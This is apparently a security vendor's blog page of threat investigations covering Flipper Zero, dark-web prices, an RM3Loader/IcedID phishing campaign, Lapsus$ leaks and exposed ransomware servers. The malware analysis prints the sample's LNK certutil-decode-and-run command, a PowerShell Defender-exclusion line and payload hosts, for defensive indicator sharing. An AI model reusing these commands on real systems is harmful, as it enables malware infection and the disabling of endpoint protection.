Customer portal
Category

Investigation

"Flipper
Investigation, Opinion

Flipper Zero: An Introduction to Its Capabilities and Potential Risks

By Daniel Collyer, Threat Intelligence Analyst, SOS Intelligence

What is Flipper Zero?

Flipper Zero is a portable, multi-function device, similar in style to the Tamagotchis of the late-90s.  While presenting itself as a cute gaming device, complete with a dolphin mascot, under the covers it is a versatile device that allows the user to interact with access control systems.  It can read, copy, and emulate NFC and RFID tags, radio remotes, iButton, and digital access keys.

The device

Development of Flipper Zero began in August 2020 with a Kickstarter campaign to raise funds for research and development.  It was developed to build a sleek and versatile device to replace the more unwieldy options already available.  The result was a single-case device with multiple features and skills to assist prototyping, hardware research, and penetration testing.

One of the key aspects of Flipper Zero is its commitment to open-source development. Its hardware and firmware are openly available, allowing users to modify and enhance its functionalities according to their specific needs. The open-source nature of Flipper Zero fosters collaboration, knowledge sharing, and continuous improvement within the hacker and security research communities.

Inside Flipper Zero – image credit Flipper Zero

What can it do?

Sub-Ghz radio frequencies

Flipper Zero contains a 433MHz antenna which allows it to access Sub-1 GHz radio frequencies.  Its chipset gives it a range of ~50m for targeting wireless devices and access control systems, such as garage doors, boom barriers, IoT sensors, and remote keyless systems.

RFID (125 kHz)

A 125 kHz antenna allows Flipper Zero to read low-frequency proximity cards.  Older cards, with no authentication mechanisms, can be stored in memory for later emulation.

NFC

Flipper Zero pairs its RFID capability with a 13.56Mhz NFC module.  This provides a high-frequency (HF) alternative  which allows the device to read, write and emulate tags

Infrared

Flipper Zero’s infrared transmitter can control electronics, such as TVs, stereo systems, etc.  Common TV vendor command sequences are contained in a built-in library which is constantly updated and maintained by the Flipper community.  It also functions as a receiver, which can receive signals and store them for later use.

Hardware Hacking

Flipper Zero allows versatility for hardware exploration, firmware flashing, debugging and fuzzing.  The device can be utilised to run code or provide control to hardware connected via GPIO.  It can function as a regular USB to UART/SPI/I2C/etc adapter.

Bad USB

Flipper Zero can emulate USB slave devices, making it appear as a regular device when attached to a computer, similar to a USB Rubber Ducky.  It can be pre-programmed with payloads to execute upon connection or provide functionality for USB stack fuzzing.

iButton

Flipper Zero has a built-in 1-Wire connector with a unique design which allows it to read and probe iButton sockets.  This allows it to read keys, store IDs in memory, write IDs and even emulate keys themselves.

Bluetooth

Flipper Zero has a built-in, fully supported, Bluetooth Low Energy module, allowing it to act as a host and peripheral device.  A corresponding open-source library provided by the developers gives functionality support to community-made apps.

Open-Source Firmware

The key property of Flipper Zero is its open-source firmware.  By making this available to all, the developers have encouraged the modification and extension of the Flipper Zero code.  This allows access to all functions and hardware used by Flipper Zero to allow users to generate bespoke tools, for example, homemade dosimeters or carbon dioxide detectors

What are the risks?

As with a vast majority of technical tools and devices of this type, the Flipper Zero is not inherently malicious or illegal.  Its abilities make it a useful tool for penetration testing, ethical hacking, and hardware development.  However, Amazon has taken the view that the device is a “card skimmer”, and the Brazilian government have been seizing shipments of devices due to its alleged use in criminal activity.

Such a tool is not new to the market.  Existing hardware, such as Arduino or Raspberry Pi, has often been utilised to develop hardware for nefarious purposes.  The initial hardware itself is by no means illegal, and the same can be said for Flipper Zero.  Instead, we have looked at the people using the device.

Using SOS Intelligence’s intelligence platform, we have researched and tracked discussions of Flipper Zero on the Dark Web and across online criminal forums.  Using “Flipper Zero” as a keyword, used our Alerts system to identify and flag instances where Flipper Zero is mentioned online.

Our period of monitoring ran from the start of 2023 to  June 2023.  In that time we generated 158 alerts on the keyword “Flipper Zero”.  We have been able to break these down into the following:

Number vs Post Content
Number vs Language
Source Occurence

Our data shows that, while there has not been much in terms of published development within criminal forums or the dark web, there has been significant interest in what has been posted.  Exploit development has been particularly popular within the Russian-language forums.  The use of Portuguese in more recent Dark Web posts was noted, and this appears to coincide with the Brazilian Government banning the importation of Flipper Zero.

As the product becomes more widely available and used by the community, we expect to see a rise in the number of posts details exploit development as more people share their work with the community.

Cracked.io

Tesla Charging Door Mods

On 16 May 2023, we identified Cracked.io member AKA Fu33y creating the thread “OPEN TESLA CHARGING DOORS MOD WITH FLIPPER ZERO”.  

The result was a post containing Anonfiles links to two .sub files.  These contained configuration data required to utilise Flipper Zero’s sub-GHz antenna to open the charging doors on Tesla vehicles.

Probing further into AKA Fu33y’s activity, we identified a second post from 16 May 2023 titled “HACKER FIRMWARE FOR FLIPPER ZERO”.

Hacker Firmware

This post provided a link to a GitHub repository where over 250 contributors have customised and improved the Flipper Zero firmware, creating an “Unleashed” variant.  The creators of this variant are explicit in their condoning of any illegal activity using Flipper Zero and state that their software is for experimental purposes only.  This variant provides a massive expansion to the abilities of Flipper Zero’s inbuilt capabilities, widening the scope for criminal use.

Hackforums

We were able to identify similar activity on Hackforums.  User AKA aleff shared their own GitHub repository (my-flipper-shits).

Bad USB Payloads

This repository focused on scripts to utilise the BadUSB function.  They range from simple pranks, such as rick-rolling, to more exploitative functions, including data exfiltration or malicious code execution.

User AKA Angela White provided instructions on utilising cheap components and open-source software to create a WiFi Dev Board.

Utilising this upgrade, with the mentioned Wifi Marauder software, would turn the Flipper Zero into a device capable of sniffing or attacking WiFi networks.

Exploit.in

Flipper Zero is still relatively new to the market, and supply issues have meant that they have not progressed far into the community as yet.  However, as it does, more opportunities will be given to both benevolent and malicious developers to generate custom firmware and code for Flipper Zero.  Our alert system has identified user AKA Rain_4, a member of Exploit.in, discussing the BadUSB possibilities of Flipper Zero and providing a basic code for creating a reverse shell for MacOS devices.  This highlights how, with only a few lines of code, the Flipper Zero can be utilised to gain access to victim devices (this does of course require Flipper Zero to be connected to the victim device).


Key Takeaways

The device itself: To reiterate, Flipper Zero is not in and of itself a malicious device.  It can have multiple benevolent uses and has the potential to be a useful multitool for practical operators in the cyber security industry, such as ethical hackers and penetration testers.  However, our data is showing that as the product becomes more widespread and available to the public as a whole, malicious users are generating code, tools and firmware to turn Flipper Zero into something more malicious than maybe its creators intended.

Using SOS Intelligence: What was apparent from the research undertaken, was how SOS Intelligence enabled us to do this in a straight forward and efficient manner. Historically, this kind of deep dive into the more nefarious uses would not have been possible.

Using keywords and phrases and looking into the forums and sites where this kind of thing is routinely discussed was both easy and enjoyable. We’ve worked hard improving the user experience and UI and the feedback from this continues to be incredibly positive.

“In today’s rapidly evolving digital and physical landscape, comprehending emerging threats like FlipperZero is of utmost importance. Robust intelligence coverage, including monitoring adversary communication, enables informed risk-based analysis to understand the implications of this new digital radiofrequency tool. Our publication of article on “Flipper Zero:  An Introduction to Its Capabilities and Potential Risks” serves as a valuable guide for defence, equipping stakeholders with insights to navigate this threat through informed analysis and strategic decision-making while demonstrating the capability and ease of use of our platform.”

Amir Hadzipasic, CEO and Founder

If you’d like to learn more, then please click here to book a demo.

References

  1. https://habr.com/ru/companies/vk/articles/723996/
  2. https://www.bleepingcomputer.com/news/technology/flipper-zero-banned-by-amazon-for-being-a-card-skimming-device-/
  3. https://www.bleepingcomputer.com/news/security/brazil-seizing-flipper-zero-shipments-to-prevent-use-in-crime/
  4. https://github.com/meshchaninov/flipper-zero-mh-z19
"Dark
Investigation, The Dark Web

Dark Web Services Current Average Prices

It started with a tweet.

The dark web has long been associated with illegal activities and the sale of illicit goods and services. Among the many services offered on the dark web, hacking services are particularly prevalent.

Daniel’s tweet

We had our PIR and got to writing an Intelligence Requirements sheet following the PESTLEP model and that allowed us to prioritise our Collection Plan.

Collection plan.

With which we were able to start our collection process and begin answering Daniel Card’s Tweet.

The collection process consisted of using the SOS Intelligence platform to identify current active market places for the specific IR areas we had to answer to.

Our platform has the capability to scan the dark web very quickly, with the ability to rotate around all active Onion services within 24-48 hours. This gives us a clear view of current and active Onion services.

In addition SOS Intelligence has a broad range of automatic closed and open forum collection giving us a real time view into purchases and sales.

Gathering the relevant information and calculating averages per service, per market place. 

The research

The research for this article looked at around 40 different current dark web marketplaces and clear web and dark web forums, where hacking services are commonly offered for sale. The average prices for the services mentioned were determined based on the information gathered from these sources.

According to our research, the average price for a stolen credit card on the dark web is around $243.15.

This may seem like a low price, but the value of a stolen credit card can vary depending on the country it was issued in and the remaining balance on the card. For example, a credit card from the United States may be worth more than one from a less economically developed country. To keep things as like for like as possible we took the average card limit for a USA bank.

Counterfeit money is also commonly available on the dark web, with the average price per $1,000 coming in at around $396.24.

This may seem like a high price, but it’s important to remember that producing high-quality counterfeit money can be a time-consuming and expensive process.

Botnets, which are networks of compromised computers used to launch distributed denial of service (DDoS) attacks, are also commonly available on the dark web.

The average price for a botnet or DDoS attack is around $382.41.

Another common service offered on the dark web is the sale of  so called residential proxies,  which are more difficult to detect and block as they “proxy” a cyber criminals connection out through a residential ISP. These proxies are used to mask the true IP address of the user and are often used by hackers to avoid detection.

The average price for a residential proxy is around $645 per month.

Finally, initial access to a target network is often available for sale on closed forums and marketplaces. This can include login credentials or vulnerabilities in a network that can be exploited to gain access, Initial Access or AI is typically the first ‘open door’ into a victim’s network and can lead to ransomware.

Prices for this service ranged wildly from a few hundred dollars to tens of thousands, due to wide ranging victims and seller motivations, varying greatly depending on access offered, method of access and compromised company.

The average price for initial access to a network is around $7,700. 

In conclusion, the dark web is a hub for a wide range of hacking services, from stolen credit card information to initial access to target networks.

While the prices for these services may seem steep, it’s important to remember that at least for some of the services offered there is a more demand than supply.

It is also important to note that there is no guarantee with any of the services provided and the sellers or marketplaces themselves could be scams or scammers although a majority do offer purchase through escrow.

Header photo by Jefferson Santos on Unsplash.

"SOS
Investigation

Investigation into the RM3Loader lnk delivery with a Michael Page recruitment campaign theme

Authors: Manraj and Amir Hadzipasic

SOS Intelligence observed an unusual phishing campaign that appeared to be delivering a PDF. Although malware is not a focus for us we couldn’t ignore the opportunity to investigate a new and interesting malware delivery mechanism.  

Sample 1 Email Headers

spf=pass [email protected];

dkim=pass header.d=aruba.it header.s=a1;

dmarc=none

Received: from smtp202-pc.aruba.it (smtp202-pc.aruba.it [62.149.157.202])

by with ESMTP id 3jsqqq1e9h-1

for <>; Tue, 27 Sep 2022 15:28:52 +0100

Received: from [127.0.0.1] ([83.32.137.88])

Content-Type: text/html; charset=UTF-8

Subject: A New Career Opportunity

From: “Michael Page Recruitment” <[email protected]>

Date: Tue, 27 Sep 2022 07:28:51 -0700

Message-ID: <[email protected]>

To: 

X-Mailer: Apple Mail (2.2104)

Link: https://kakjumi[.]com/download/?rht=[REDACTED]&pass=[REDACTED]&ynu=[REDACTED]&close=[REDACTED]&t=[REDACTED]&id=[REDACTED]

Updated Date: 2022-09-08T07:00:00Z

Creation Date: 2020-07-09T07:00:00Z

Registrar Registration Expiration Date: 2023-07-09T07:00:00Z

Registrar: NameSilo, LLC

Redirects to

https://michaelpageuk5ukln[.]com/michael-page/log.php?rht=[REDACTED]&pass=[REDACTED]&ynu=[REDACTED]&close=[REDACTED]&id= [REDACTED]

Updated Date: 2022-08-23T00:00:00Z

Creation Date: 2022-08-23T02:51:42Z

Registrar Registration Expiration Date: 2023-08-23T00:00:00Z

Registrar: ERANET INTERNATIONAL LIMITED

Sample 2 Email Headers

spf=pass [email protected];

dkim=pass header.d=encoreshop.com.br header.s=20211014;

dmarc=none

Received: from us2-ob2-1.mailhostbox.com (us2-ob2-1.mailhostbox.com [162.210.70.55])

by with ESMTPS id 3jsqqq1f8t-1

(version=TLSv1.2 cipher=ECDHE-RSA-AES256-GCM-SHA384 bits=256 verify=NOT)

for <>; Tue, 27 Sep 2022 16:46:13 +0100

Received: from [127.0.0.1] (unknown [87.116.246.51]

From: “Michael Page Recruitment” <[email protected]>

Subject: Work with us

Date: Tue, 27 Sep 2022 08:46:10 -0700

Importance: normal

X-Priority: 3

Content-Type: text/html; charset=”UTF-8″

Link:

https://tyte-hosting[.]com/download/?t=[REDACTED]&close=[REDACTED]&ynu=[REDACTED]&rht=[REDACTED]&pass = [REDACTED]&id=[REDACTED]

Updated Date: 2022-09-21T16:51:32Z

Creation Date: 2004-09-25T05:30:32Z

Registrar Registration Expiration Date: 2023-09-25T05:30:32Z

Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com

Redirects to:

https://michaelpageuk5ukln[.]com/michael-page/log.php?rht=[REDACTED]&pass=[REDACTED]&ynu=[REDACTED]&close =[REDACTED]&id=[REDACTED]

Phishing/Malware download page

The application appears to be more advanced than generic phishing kits. It features an initial CAPTCHA and a number of API callbacks. 

Downloaded Zip LNK content, self referencing 

%comspec% /c if exist %tmp%\temp1_job_offer.zip\job_description.pdf.lnk  (certutil.exe -decode %tmp%\temp1_job_offer.zip\job_description.pdf.lnk %tmp%\.hta&start %tmp%\.hta) else (certutil -decode job_description.pdf.lnk %tmp%\.hta&start %tmp%\.hta)

Ensures that the hta file is produced regardless of how the lnk is executed, either from within the zip archive via cmd.exe /c or dropped via certutil decode – in parallel. 

Certutil is used to decode the embedded BASE64 encoded HTA file.

It is then called for execution by the &start statement. 

The HTA file is nested, self referencing contains the decoy PDF, assumed to be IceID DLL and other elements. 

The HTA code is self contained, encoded in base64 within the pdf.lnk, disguised as a certificate and is decoded and written as a .HTA when the certutil -decode command is run.

Hta file structure  

HTTP Callback

This function may just be for statistics/tracking purposes.  

Offset extraction, launching of decoy PDF  and dll

Offset extraction is performed through the use of the ADODB.Stream function to read / write parts of the HTA document, as in this case the sample we saw loads in sections of embedded content and saves them to the user profile temp location via calling specific file size offsets. This is selected by wrapping the file openastextstream() function inside a mid() function and selecting the start position and length of the string.

:x=mid(fil.openastextstream().read(fil.size), 7928,85890)

The dll is loaded via regsvr32 passing the /s (silent) flag. It has been observed that the dll will not execute with regsvr32 unless the /s flag is used.

The dll is 342,323KB!, however after offset 000837E0 the entirety of the DLL’s contents is /x20 (space). I noticed that this may(?) be an anti-analysis technique as most sandboxes will not accept a file over 60mb and tools will not effectively handle a dll over 40mb such as CFF explorer.

Calls to 91.240.118.155 HTTPS (michaelpageuk5ukln.com, prakebtpboylodod.com)

Prakebtpboylodod.com hosts http://prakebtpboylodod[.]com/s2.dll which appears to be fetched by the originally loaded dll.

The script also calls for a defender exception to “C:\” and the waits for 15 seconds

set q=CreateObject(“WScript.Shell”):q.Run “powershell -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAQwA6AFwAIgA7AHQAaQBtAGUAbwB1AHQAIAAxADUA”,0:q.Run “timeout.exe /t 30”, 0, True

Encoded Powershell command:

Add-MpPreference -ExclusionPath “C:\”;timeout 15

A further timeout.exe is run for 30 seconds. 

Timeout.exe being run in your environment should be suspicious. 

Execution Overview Diagram 

The hta embedded pdf although benign itself, being observed open in msedge as part of clicking the lnk within the zip archive or externally is an indicator of infection. 

Network based indicators 

Once the DLL is run, regsvr32.exe makes connections from different local ports to port 443 on the remote host. The local port numbers that connections come from increment sequentially when a connection can not be established. Seeing regsvr32.exe make multiple outbound connections should be considered suspicious.

In addition to this, seeing timeout.exe making outbound connections to port 443 should also be considered suspicious.

Host based indicators

Host based indicators

Files created

C:\Users\%USERPROFILE%\AppData\Local\Temp\temp1_job_offer.zip

C:\Users\%USERPROFILE%\AppData\Local\Temp.hta

C:\Users\%USERPROFILE%\AppData\Local\Temp\job_description.pdf

C:\Users\%USERPROFILE%\AppData\Local\Temp\x.dll

This loader seems to prefer to store files with the temp folder and uses the user environment variable of %tmp% or via GetSpecialFolder(2) (2 = Temp).

File hashes:

dll:

e2b80b8cbd660c3208162ed596e0443ea8f786b6fd1f809f2d2a1e07fe6475cd 

pdf:

e2981bd67116d744e2af43b0fc864e255dd57b1b961110df12a3d98ec465e947

Second “dll”:

a5a211ceeccbe61c374fec9286e0185674a2ba98bc82711cf61f57b586fd7f19

job_offer.zip

3bcfe639a418ffca0e3e839dc19d394b7b4455ce24db3fbb5cc09a7169da4046 

dll runtime IOCs 

RM3Loader CnC Panel communication:

Higmon.cyou

Prises.cyou

45.8.147.179

45.67.229.39

Stark-Industries is an allegedly Russian owned & operated hosting company that has been observed being used by a number of various campaigns.

[ref] https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-vmware-rce-flaw-to-install-backdoors/

[ref ]https://twitter.com/JAMESWT_MHT/status/1558171595562254340

Task Item embedded in email sample:

We are unsure exactly how this feature applies but it could be something specific to an outlook client allowing for automatic creation of a Task.

The activity of using a zip file with a document inside (in our unique case a pdf.lnk) has previously been observed with the IcedID malware. In both cases use mshta.exe to execute an .hta file which then results in a malicious dll being written to disk.

The main differences are that the previously observed activity documented by Vmware uses the .hta to download the dll from a remote server, whereas we have observed a unique method of unpacking and executing the first stage payload. The pdf.lnk contains the .hta file, base64 encoded disguised as a certificate.

When this is decoded and written to disk, the .hta then references itself by offset to unpack the malicious dll and decody pdf. https://blogs.vmware.com/security/2021/07/icedid-analysis-and-detection.html 

Another similar sample can be found here, with a number of other public submissions being attributed to IcedID. A commonality with these samples is that they convey themselves to be business related documents (invoice.zip, request.zip etc), however when unzipped seem to be .rtf documents, word documents with macros or .lnk files disguised as folder shortcuts (Documents.lnk).  https://any.run/malware-trends/icedid

Key takeaways

  • RM3Loader is using a self referencing LNK file to execute commands that self reference.
  • Payload contained within the dropped Zip file and decoded using CertUtils.
  • LNK does an important job of decoding the embedded HTA file and executing it.
  • HTA contains VBScript that self references content embedded in the HTA file to deploy a decoy PDF document and load the IceID dll.
  • IceID behaviour has not significantly changed.
"Lapsus$"/
Investigation

SOS Intelligence analysing Lapsus$ data and breaches

We’ve been tracking what Lapsus$ have been doing and we’ve been analysing the data from the latest breaches. Like most hacking collectives SOS Intelligence has been aware of and tracking the activity of the LAPSUS$ group for some time.

The group has contributed to some high profile and impact breaches in the last few months. They have been utilising what could be considered as fairly “low tech” methods to gain a foothold on their targets. Using our multi-faceted intelligence collection pipelines we are able to keep a track of the groups activities and announcements.

This time, the data included a large amount of GitHub source code that appears to belong to Globant, a major company with over 16000 employees and and $1.2 billion in revenue for 2021. This is with a number of repositories that contain “very sensitive information” such as TLS certificate private keys and chains, Azure keys and API keys for 3rd-party services.

TechCrunch have written about this and we were quoted on their article:

SOS Intelligence, a U.K-based threat intelligence provider that analyzed the leaked data, told TechCrunch that “the leak is legitimate and very significant, as far as Globant and Globant impacted customers are concerned.”

Techcrunch, March 30th 2022

Lapsus$ were only just in the news days ago with an Oxford teen accused of being multi-millionaire cyber-criminal connected with the group. Joe Tidy has an excellent article of what happened and how the teen in question was “doxxed” over on the BBC.

ITPro also cover this with comment from ourselves:

“From the paths I have looked at so far it looks like legitimate source code for mobile apps,” said Amir Hadžipašić, CEO and founder of SOS Intelligence to IT Pro. “It looks like there are internal microsites and data for them too, CVs and other personal information.

“That’s not all, they have full private keys for certs in most of the directories,” he added. “That there would be enough for me to stand up a website and serve their SSL and it be valid.”

IT Pro, 30th March 2022

Last but not least, we spoke to Bleeping Computer who have also covered this:

“In terms of legitimacy, going just by volume alone it’s hard to fabricate that amount of data – however samples of the data have been cross referenced with live systems and other methods that show the leak is legitimate and very significant as far as Globant and Globant’s impacted customers are concerned”.

Bleeping Computer, March 30 2022

For any size organisation, we help you sleep easier by giving you real time alerts of key phrases, emails and domains that appear on the Dark Web. For a demo, click here and we look forward to helping you.

Photo by Clint Patterson on Unsplash.

"SOS
Investigation, Ransomware

A Special Investigation exposing a ransomware group’s clear-web IP and their duplicate identities

Intro

Before we dive into this investigation it’s worth to just spend a brief moment to describe the Apache Server-Status page.

The Apache Server Status page is a diagnostics and metrics page provided by the mod_status module. When mod_status is enabled a metrics page is served via localhost on the /server-status path. 

This page is typically served via localhost only. It offers diagnostic information about the Apache service and client requests. It shows the full request URI and client IP information.

Serving this page in production, outside of localhost would be considered an information disclosure vulnerability and could offer an attacker information about client requests, essentially anything disclosed in a POST request URI or GET request. 

In the scope of Tor onion services where a Tor service is published it will inherently expose all localhost services to the entirety of Tor – therefore any services designed to be protected by the typically non externally routeable local loopback interface become externally accessible.

Locating Onions with Server-Status Pages

We must first export a list of all onions we are aware of that have server-status pages. One of the tasks we perform when crawling an onion service is to identify interesting paths and services. We perform a check for common directories such as server-status along with many others.

This process is identical to a directory enumeration, except for being far more optimised to ensure crawler performance is prioritised.

Therefore using our path API we are able to query for all onions we’ve found and that are operational with server status pages:

server path search for server-status pages API

We find that there are 1,370 results with server-status pages:

Search results JSON export

The next task is to compile a list of all known (relatively current) ransomware blogs. We do this by merging our own lists, those we’ve found via OSINT and other published ransomware group site lists.

Of those we find a total of 71 onion unique addresses, these include v2 and v3 onions.

Now we have a relatively straightforward task of cross-checking our server-status results against this list to see what ransomware group sites have server-status pages, if any.

We do this with a very simple bash script that uses the grep tool:

Checking out output we see that there are in total only 3 ransomware blogs/group sites:

Arvin Club, Haron & Midas

Checking the first, Arvin Club:

We see that the server status page presents a vhost of localhost, not much to go by!

We also note that the server is running Ubuntu and is located in the UTC time zone.

Haron Server-Status Page

Checking the Haron server-status page we see that again the vhost is localhost, the server is running Debian and the time zone is Moscow Standard Time (MSK)

Lastly, checking the Midas server status page:

Midas Server-Status Page

We see a VHOST that is not localhost, this time it shows as “Becquerel.selectel.ru”

A server running Debian and a time zone of Moscow standard time.

Becquerel.selectel.ru

The hostname exposed in the servers-status page for the Midas shows that the web server running the Midas blog is being hosted by Selectel a Russian cloud hosting company:


For at least a short period of time the clear web portion of the Midas blog was exposed to the internet allowing Google to crawl and index the server-status page. 

The Google Cache is of a AWS IP, Germany “3.70.39.23” . According to the Google Cache entry the server was exposed at least up to 27th of September 2021 likely some time before that date, possibly after the 2nd of October 2021. 

How are we sure that this cache entry is the Midas blog web-server? 

It could very likely have been another server if Selectel reprovision hostnames. The evidence contained in the server-status client requests for the Becquerel host cache page are unique to the files found on the current Midas blog. 

Identical files requested in the Google Cache as what exists on the Midas blog web server

We can say with strong certainty that the cache entry, the clear-web IP and hostname all belong to the Midas web server and that the host is current and operational. 

Linking Midas to Haron and Avaddon

Reviewing the client request on refresh revealed some interesting paths. These paths point to image and file locations. Further investigation of these paths uncovered content that is shared or identical to both the Haron and Midas blogs. 

For example…

Haron test.jpg image

Midas test.jpg image

Artist: https://twitter.com/JarekMadyda

Midas Victim file [redacted]

Identical victim file on the Haron web server

Midas Mess directory

Mess directory

Identical but older Mess directory on the Haron web server

Haron mess directory

There is significant cross referencing between folder structures and files to show that the Midas web blog is a copy of the Haron web blog, if we go by the last modified date stamps on all of the files we have been able to observe across both blog sites. 

Not only do the sharing of files and file structure suggest that this is the same group/operator but both web sites have each other’s logos.

Further, we can see logo “development” taking place with logo names such as “newlogo2.png” and “finalLogo.png”. We propose it would be very unusual for one seemingly competing group to have another group’s logo on their web server and indeed for them to have each others!

The curious case of Avaddon

On the topic of logos. Investigation showed that both Haron and Midas contained the logo file for Avaddon Ransomware group:

There were rumours that not only Haron / Midas were the same group but that there were links with Haron to Avaddon.

Forum post on the Dublikat (Duplicate) dark web forum:

“Haron is built on code copied from other ransomware. So, the researchers noticed the following “parallels”: to create binaries, Haron uses the old ransomware builder Thanos; The ransomware site, where victims are asked to negotiate and pay the ransom, is almost identical to Avaddon’s site (as is the site for leaking stolen data); the ransom letter contains large snippets of text copied from a similar Avaddon note; Haron’s server contains icons and images previously found on the official Avaddon website. What all these similarities are connected with is still unclear. The researchers believe that the Haron operators may have hired one of the former Avaddon members, but they clearly did not have access to the source code of the Avaddon ransomware.”

Translated.

We are now able to shed a bit more light on this forum post. It would seem that not only did Haron share resources, images text and icons but so does Midas now too, since it is just a copy of the Haron blog.

Although Avaddon is now defunct and their onion address is no longer valid we’ve been able to extract a html cache of their page from our index. 

Making minor changes to the HTML code, to refacing the Midas and Haron onion address we’ve effectively been able to “resurrect” the old Avaddon website.

Minor html updates to the Avaddon historic html source:

These minor updates allowed us to load the html source and have the page render in an almost exact way it would have done in the past.

Avaddon website resurrected loaded locally from a file:

And this is because the file and folder structure of the Haron / Midas websites still contain the original logo CSS and other content that were made for the Avaddon ransomware group website.

We are therefore able to put forward the claim supported by the evidence in this article that all previous suggestions that these groups were interlinked do appear to be correct.

We’ve confirmed the following Clear Web IPs for both Haron and Midas, both hosted by Selectel Russia:

45.146.164.58 – Midas

45.93.201.176 – Haron

This proves our assumption that the blogs are hosted on separate VMs both hosted at Selectel.

1 2
Privacy Settings
We use cookies to enhance your experience while using our website. If you are using our Services via a browser you can restrict, block or remove cookies through your web browser settings. We also use content and scripts from third parties that may use tracking technologies. You can selectively provide your consent below to allow such third party embeds. For complete information about the cookies we use, data we collect and how we process them, please check our Privacy Policy
Youtube
Consent to display content from - Youtube
Vimeo
Consent to display content from - Vimeo
Google Maps
Consent to display content from - Google
Spotify
Consent to display content from - Spotify
Sound Cloud
Consent to display content from - Sound